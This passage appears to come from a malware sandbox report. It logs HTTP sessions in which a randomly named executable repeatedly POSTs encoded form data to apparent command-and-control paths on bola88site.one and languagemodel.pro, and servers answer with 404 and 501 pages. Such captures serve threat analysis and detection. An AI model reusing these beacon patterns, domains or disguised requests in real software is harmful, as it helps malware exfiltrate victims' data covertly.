                                              Data Raw: 37 6c 70 50 47 78 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 59 52 51 59 55 77 50 69 65 4a 2b 36 55 53 66 51 79 70 69 67 67 4c 4b 41 4a 31 36 67 36 65 59 42 44 77 32 77 71 39 6d 72 68 55 55 73 57 59 45 73 77 3d 3d
                                              Data Ascii: 7lpPGx=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUYRQYUwPieJ+6USfQypiggLKAJ16g6eYBDw2wq9mrhUUsWYEsw==
                                              Sep 25, 2024 11:37:44.122807026 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 09:37:43 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.752113172.96.191.39804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:45.725790977 CEST852OUTPOST /3qit/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.bola88site.one
                                              Origin: http://www.bola88site.one
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.bola88site.one/3qit/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 7a 78 45 4c 52 4d 33 63 44 74 44 43 30 75 39 49 4a 48 30 57 78 2b 68 45 35 41 36 45 50 47 37 4a 48 31 57 6e 52 72 6b 71 34 31 71 41 4c 4c 6c 64 41 3d
                                              Data Ascii: 7lpPGx=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+xzxELRM3cDtDC0u9IJH0Wx+hE5A6EPG7JH1WnRrkq41qALLldA=
                                              Sep 25, 2024 11:37:46.660654068 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 09:37:46 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.752114172.96.191.39804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:48.267643929 CEST1865OUTPOST /3qit/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.bola88site.one
                                              Origin: http://www.bola88site.one
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.bola88site.one/3qit/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 42 39 78 6c 4b 4c 50 68 52 44 69 68 54 43 49 34 46 61 78 4f 58 65 4c 51 77 6c 77 4c 74 62 78 6e 39 37 6d 47 78 31 79 44 43 58 6e 36 62 4c 62 57 52 4a 6b 50 52 36 77 7a 58 52 77 6f 48 4d 52 41 65 65 30 4b 4b 65 58 76 61 39 7a 53 43 30 63 44 38 56 65 79 6a 6e 35 4d 70 4c 50 62 61 52 74 34 63 5a 39 34 6d 2b 56 6a 53 74 4c 46 7a 6c 6d 50 75 61 6e 6e 52 66 62 2f 67 71 39 4a 57 2f 4c 5a 49 6a 65 6b 4d 43 63 51 75 5a 41 48 39 6a 76 58 69 33 30 58 4a 2b 64 59 4d 69 6d 4c 38 69 58 6f 6c [TRUNCATED]
                                              Data Ascii: 7lpPGx=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOeO33KzFIfTiflxY5Q0dxPlQACE8/5X60s46BmLqRg3Qitr8ZdxBsbRDl+HBd9fI16azAf663oKvItzMWdVe1i9tiNxJJ2sX6R942V/08YXSPQaUTZLylLzeY4qAnwEjfB9xlKLPhRDihTCI4FaxOXeLQwlwLtbxn97mGx1yDCXn6bLbWRJkPR6wzXRwoHMRAee0KKeXva9zSC0cD8Veyjn5MpLPbaRt4cZ94m+VjStLFzlmPuannRfb/gq9JW/LZIjekMCcQuZAH9jvXi30XJ+dYMimL8iXolwv+EOvZ+HWPrk4Zz418ft4p6SI4tZKOO0YAl6L/b5yTKqstQNd4buwdKddOELFA7FnNL8YY47F1XOEiu6hSjmlB9LiD/m90oepaWLGoweGfVXTzhiP6bt0jmPFRuLwVTj7B6CVguWnc3eYUzl+cu/m1++P0ZICnkO+LMy1LyOeZQnqxGV0OPG15G2erGr582illRHqrFjhsFHXXkke+UG4ZDFliJcVO5EOg4nLCG1C6DMljhOjRKP2sqL+7QIN/BfzCrOyvpF8Sv+i5IPTz8lD9ztUN+f35vrQpfpGxXPojt7gXegLlXw3odoPIADWonPBLzndFE27G+KTU8EHcRFhsdHcTK+kAcLh72vNjv2eykZJoZbsnf/mBb4FMNwW0T+3ySNgWVaSqcxEtFVLDRZaJtms4CVTwzwNJgQ8+ekoOcWYeRLzIMCvQl6DpaxNGQSzb4R8IVTm7vXbyQ/tno/SmbJDBudLejwq7PHsoYZQHNvd+mkzr3kZLLd7Xvdytl6vXxPWFc47AfMb65bNqO3YKkGN7Di3e9VoNKEu/NsRnMSf5nKk3IsaQo0vG8PZSgbZVb9fL8JxP3CfjnI7tYV5hY6E7MaOfOLjwzt2JoaZyr9TvWF2s3zXSelZpq//11lkRnHk9a6y+5bhwuQxTEiUicAt4909wc5L [TRUNCATED]
                                              Sep 25, 2024 11:37:49.179666042 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 09:37:49 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.752115172.96.191.39804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:50.812529087 CEST572OUTGET /3qit/?7lpPGx=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQxg90ohUPLnuDBmcV/JKR3qQ6hCHukB1vPlSHURbGTm5jGBVUo3vRYYo&QF4tL=lBP8AZrpnb HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.bola88site.one
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:37:51.714113951 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 09:37:51 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.752116217.70.184.50804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:56.961630106 CEST841OUTPOST /nxfn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.languagemodel.pro
                                              Origin: http://www.languagemodel.pro
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.languagemodel.pro/nxfn/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 55 64 5a 71 6f 51 70 6c 49 64 45 38 35 46 5a 65 75 35 51 74 79 4f 42 36 56 48 38 49 53 7a 59 6e 66 41 76 4e 73 52 36 4e 35 75 58 69 69 4c 44 43 41 3d 3d
                                              Data Ascii: 7lpPGx=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdUdZqoQplIdE85FZeu5QtyOB6VH8ISzYnfAvNsR6N5uXiiLDCA==
                                              Sep 25, 2024 11:37:57.561903954 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:37:57 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.752117217.70.184.50804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:59.505280018 CEST861OUTPOST /nxfn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.languagemodel.pro
                                              Origin: http://www.languagemodel.pro
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.languagemodel.pro/nxfn/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 32 36 2b 58 6a 4b 66 30 75 74 6c 65 45 33 41 4f 6c 62 53 4f 4c 39 76 77 71 48 55 31 7a 49 79 6d 46 4a 6a 39 55 6d 75 7a 68 55 43 5a 33 54 4c 41 63 3d
                                              Data Ascii: 7lpPGx=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zj26+XjKf0utleE3AOlbSOL9vwqHU1zIymFJj9UmuzhUCZ3TLAc=
                                              Sep 25, 2024 11:38:00.093703985 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:38:00 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
